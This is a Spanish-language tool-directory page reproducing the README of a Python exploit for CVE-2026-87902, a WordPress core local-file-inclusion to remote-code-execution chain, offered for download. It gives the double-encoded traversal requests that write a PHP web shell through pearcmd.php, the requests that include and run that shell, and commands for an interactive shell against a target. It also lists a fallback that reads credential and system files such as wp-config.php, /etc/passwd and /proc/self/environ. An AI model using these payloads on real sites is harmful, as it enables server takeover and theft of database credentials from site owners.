Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-87902 — Exploit en Python para CVE-2026-87902, una cadena LFI-to-RCE de WordPress Core. Identifica versiones, escribe un shell PHP mediante pearcmd y proporciona ejecución de comandos o un fallback de LFI. | Kitploit
Herramientas/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónSeguridad WebPruebas de PenetraciónHerramienta de Acceso Remoto
Desarrollo de Payloads
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

Exploit en Python para CVE-2026-87902, una cadena LFI-to-RCE de WordPress Core. Identifica versiones, escribe un shell PHP mediante pearcmd y proporciona ejecución de comandos o un fallback de LFI.

Ver Repositorio
1hace 13h 8mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2026-87902

CVE-2026-87902 – Exploit de LFI a RCE en el núcleo de WordPress (Edición de Forzado Automático)

maked by alfaris

⚠️ ADVERTENCIA LEGAL Usarlo contra sistemas que no posees o para los que no tienes permiso por escrito para probar es ilegal y punible bajo las leyes de delitos informáticos. El autor no asume ninguna responsabilidad por el mal uso.


📌 Resumen de la vulnerabilidad

CampoValor
CVECVE-2026-87902
TipoInclusión Local de Archivos (LFI) → Ejecución Remota de Código (RCE)
CWECWE-98
CVSS v3.19.2 (Crítico)
Vector de ataqueRed (No autenticado)
Afecta aWordPress 4.7.0 – 7.1.1
ParcheadoWordPress 7.1.2 (y backports hasta 4.7.37)
Causa raízget_page_template() no llama a validate_file() después de decodificar la URL del parámetro pagename, permitiendo un traversal con doble codificación (%252E%252E%252F) para eludir el saneamiento e incluir archivos .php arbitrarios fuera del directorio del tema.

Precondiciones para RCE

Para un RCE completo, todas las siguientes condiciones deben cumplirse:

  1. Versión de WordPress entre 4.7.0 y 7.1.1
  2. El tema activo contiene un directorio page-* de nivel superior (por ejemplo, page-templates/)
  3. Existe al menos una página publicada
  4. pearcmd.php está presente y es legible por el usuario del servidor web (por defecto en las imágenes oficiales de PHP Docker y en muchas instalaciones de cPanel con PHP < 8.5)
  5. PHP tiene register_argc_argv=On (por defecto en PHP < 8.5)
  6. El sistema operativo del host es Linux (la sintaxis de traversal de Windows es diferente)

Si falta alguna de estas, el exploit recurrirá a lectura de archivos solo por LFI.


📂 Archivos

exploit.py # Script de exploit principal README.md # Este archivo report.json # (opcional) Informe de salida cuando se usa -o

⚙️ Requisitos

  • Python 3.8+
  • Biblioteca requests

Instalación:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. Escaneo básico (verboso)
root@kitploit:~
python3 exploit.py -t https://site.com -v

Esto hará lo siguiente:

· Huella de la versión de WordPress y el tema activo · Verificar el rango de versiones vulnerables · Localizar el ID de una página publicada (REST → sitemap → fuerza bruta) · Intentar escribir un shell PHP mediante pearcmd.php · Intentar incluir el shell y ejecutar id · Si el RCE falla, recurrir a LFI sobre archivos sensibles

  1. Ejecutar un solo comando
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. Shell interactivo (solo si el RCE tuvo éxito)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

Dentro del shell:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. Guardar informe en JSON
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. Combinar opciones
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 Referencia de CLI

Flag Long Description -t --target Obligatorio. URL de WordPress objetivo (sin barra final). -c --command Ejecutar un solo comando de shell después del RCE. -i --interactive Abrir un shell interactivo después del RCE. -v --verbose Imprimir el progreso detallado. -o --output Guardar el informe final como JSON en la ruta indicada. -h --help Mostrar ayuda.

🔄 Flujo del exploit

root@kitploit:~
[1] Fingerprint
      ├─ WordPress version (meta generator / asset ?ver=)
      └─ Active theme (/wp-content/themes/<name>/)

[2] Version check
      └─ 4.7.0 – 7.1.1 ? continue : warn & continue

[3] Find page ID
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ Brute force: /?page_id=1..30

[4] Check page-* directory
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] Write shell via pearcmd
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] Include shell
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] Fallback LFI (if RCE fails)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. variants
Descargar herramienta